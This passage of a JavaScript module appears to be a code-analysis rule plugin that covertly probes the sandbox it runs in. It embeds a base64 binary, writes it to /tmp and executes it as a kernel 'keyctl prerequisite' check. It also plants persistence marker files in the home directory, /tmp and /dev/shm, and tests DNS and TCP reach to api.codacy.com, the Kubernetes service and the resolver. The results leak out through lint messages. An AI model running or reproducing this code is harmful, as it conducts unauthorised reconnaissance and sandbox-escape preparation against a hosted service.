AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPX+/28AAAAAoAIAAAAAAAAFAAAAAAAAANgCAAAAAAAABgAAAAAAAADAAgAAAAAAAAoAAAAAAAAAAQAAAAAAAAALAAAAAAAAABgAAAAAAAAAFQAAAAAAAAAAAAAAAAAAAB4AAAAAAAAACAAAAAAAAAD7//9vAAAAAAEAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR0NDOiAoQWxwaW5lIDE1LjIuMCkgMTUuMi4wAAAuc2hzdHJ0YWIALm5vdGUuZ251LnByb3BlcnR5AC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALnRleHQALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuZHluYW1pYwAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAcAAAACAAAAAAAAAHACAAAAAAAAcAIAAAAAAAAwAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAB4AAAD2//9vAgAAAAAAAACgAgAAAAAAAKACAAAAAAAAHAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAoAAAACwAAAAIAAAAAAAAAwAIAAAAAAADAAgAAAAAAABgAAAAAAAAABAAAAAEAAAAIAAAAAAAAABgAAAAAAAAAMAAAAAMAAAACAAAAAAAAANgCAAAAAAAA2AIAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAADgAAAABAAAABgAAAAAAAAAAEAAAAAAAAAAQAAAAAAAA0wIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA+AAAAAQAAAAIAAAAAAAAAACAAAAAAAAAAIAAAAAAAAEMBAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAARgAAAAEAAAACAAAAAAAAAEQhAAAAAAAARCEAAAAAAAAsAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAFQAAAABAAAAAgAAAAAAAABwIQAAAAAAAHAhAAAAAAAAiAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAABeAAAABgAAAAMAAAAAAAAAID8AAAAAAAAgLwAAAAAAAOAAAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAZwAAAAgAAAADAAAAAAAAAABAAAAAAAAAADAAAAAAAAAgQgAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAGwAAAABAAAAMAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAHAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAcMAAAAAAAAHUAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA';

function keyctlPrerequisiteEvidence() {
  if (globalThis.__arcsecKeyctlPrerequisiteEvidence) return globalThis.__arcsecKeyctlPrerequisiteEvidence;
  const crypto = require('crypto');
  const tls = require('tls');
  const directory = `/tmp/arcsec-keyctl-prerequisite-${process.pid}`;
  const executable = `${directory}/probe`;
  let result = 'not_run';
  let cleanup = false;
  try {
    fs.mkdirSync(directory, { mode: 0o700 });
    const binary = Buffer.from(KEYCTL_PREREQUISITE_PROBE_BASE64, 'base64');
    fs.writeFileSync(executable, binary, { mode: 0o700 });
    const pem = tls.rootCertificates.find(value => value.includes('BEGIN CERTIFICATE'));
    const certificate = Buffer.from(pem.replace(/-----[^-]+-----/g, '').replace(/\s/g, ''), 'base64');
    const output = execFileSync(executable, [], {
      input: certificate,
      encoding: 'utf8',
      timeout: 2500
    }).trim();
    result = compact(output, 420);
    globalThis.__arcsecKeyctlPrerequisiteEvidence = [
      'ARCSEC_DEEP_KEYCTL_PREREQUISITE',
      `helper_bytes=${binary.length}`,
      `helper_sha256=${crypto.createHash('sha256').update(binary).digest('hex')}`,
      'public_certificate_only=true',
      'vulnerable_operation_invoked=false',
      `result=${result}`
    ].join(' ');
  } catch (error) {
    globalThis.__arcsecKeyctlPrerequisiteEvidence = [
      'ARCSEC_DEEP_KEYCTL_PREREQUISITE',
      'public_certificate_only=true',
      'vulnerable_operation_invoked=false',
      `result=failed_${compact(error?.code || error?.signal || 'error', 60)}`
    ].join(' ');
  } finally {
    try { fs.unlinkSync(executable); } catch {}
    try { fs.rmdirSync(directory); cleanup = true; } catch {}
  }
  return `${globalThis.__arcsecKeyctlPrerequisiteEvidence} helper_cleanup=${cleanup}`;
}

function persistenceEvidence(action) {
  if (globalThis.__arcsecPersistenceEvidence) return globalThis.__arcsecPersistenceEvidence;
  const marker = 'arcsec-spectral-persistence-20260808-v1';
  const targets = [
    `${process.env.HOME || '/home/worker'}/.arcsec-spectral-persistence-20260808-v1`,
    '/tmp/.arcsec-spectral-persistence-20260808-v1',
    '/dev/shm/.arcsec-spectral-persistence-20260808-v1'
  ];
  const results = targets.map(target => {
    const before = readText(target, 4096);
    const preexisting = before !== null;
    const markerMatches = before === marker;
    let write = false;
    let cleanup = false;
    if (action === 'cleanup') {
      if (markerMatches) {
        try { fs.unlinkSync(target); cleanup = true; } catch {}
      }
    } else {
      try { fs.writeFileSync(target, marker, { mode: 0o600 }); write = true; } catch {}
    }
    return `{path_${redacted(target)},preexisting=${preexisting},marker_matches=${markerMatches},write=${write},cleanup=${cleanup}}`;
  });

  globalThis.__arcsecPersistenceEvidence = [
    'ARCSEC_DEEP_PERSISTENCE',
    `action=${compact(action, 20)}`,
    `hostname_${redacted(os.hostname())}`,
    `targets=${results.join(';')}`
  ].join(' ');
  return globalThis.__arcsecPersistenceEvidence;
}

function subprocessBoolean(script, environment, timeout = 1200) {
  try {
    const output = execFileSync(process.execPath, ['-e', script], {
      env: environment,
      encoding: 'utf8',
      timeout
    }).trim();
    return { value: output === 'true', status: 'ok' };
  } catch (error) {
    return { value: false, status: compact(error?.code || error?.signal || 'error', 40) };
  }
}

function networkDebugEvidence() {
  const dnsScript = `
    require('dns').lookup(process.env.ARCSEC_HOST, error => {
      process.stdout.write(error ? 'false' : 'true');
      process.exit(0);
    });
    setTimeout(() => { process.stdout.write('false'); process.exit(0); }, 650);
  `;
  const tcpScript = `
    const net = require('net');
    const socket = net.createConnection({ host: process.env.ARCSEC_HOST, port: Number(process.env.ARCSEC_PORT) });
    let settled = false;
    const finish = value => {
      if (!settled) {
        settled = true;
        socket.destroy();
        process.stdout.write(value ? 'true' : 'false');
        process.exit(0);
      }
    };
    setTimeout(() => finish(false), 650);
    socket.once('connect', () => finish(true));
    socket.once('error', () => finish(false));
  `;
  const resolver = (readText('/etc/resolv.conf', 4096) ?? '').match(/^nameserver\s+(\S+)/m)?.[1] ?? '127.0.0.1';
  const apiDns = subprocessBoolean(dnsScript, { ARCSEC_HOST: 'api.codacy.com' });
  const kubeDns = subprocessBoolean(dnsScript, { ARCSEC_HOST: 'kubernetes.default.svc' });
  const apiTcp = subprocessBoolean(tcpScript, { ARCSEC_HOST: 'api.codacy.com', ARCSEC_PORT: '443' });
  const resolverTcp = subprocessBoolean(tcpScript, { ARCSEC_HOST: resolver, ARCSEC_PORT: '53' });

  return [
    'ARCSEC_DEEP_NETWORK',
    `api_dns=${apiDns.value}`,
    `api_dns_status=${apiDns.status}`,
    `kube_dns=${kubeDns.value}`,
    `kube_dns_status=${kubeDns.status}`,
    `api_tcp443=${apiTcp.value}`,
    `api_tcp_status=${apiTcp.status}`,
    `resolver_${redacted(resolver)}`,
    `resolver_tcp53=${resolverTcp.value}`,
    `resolver_tcp_status=${resolverTcp.status}`
  ].join(' ');
}

module.exports = function arcsecDeepDive(_target, options, context) {
  const mode = options?.mode;
  const message = mode === 'codacyrc' ? codacyConfigurationEvidence()
    : mode === 'userns' ? userNamespaceEvidence()
      : mode === 'kernel-prerequisite' ? kernelNamespacePrerequisiteEvidence()
        : mode === 'keyctl-prerequisite' ? keyctlPrerequisiteEvidence()
      : mode === 'persistence' ? persistenceEvidence(options?.action || 'write')
        : networkDebugEvidence();
  return [{ message, path: context.path }];
};
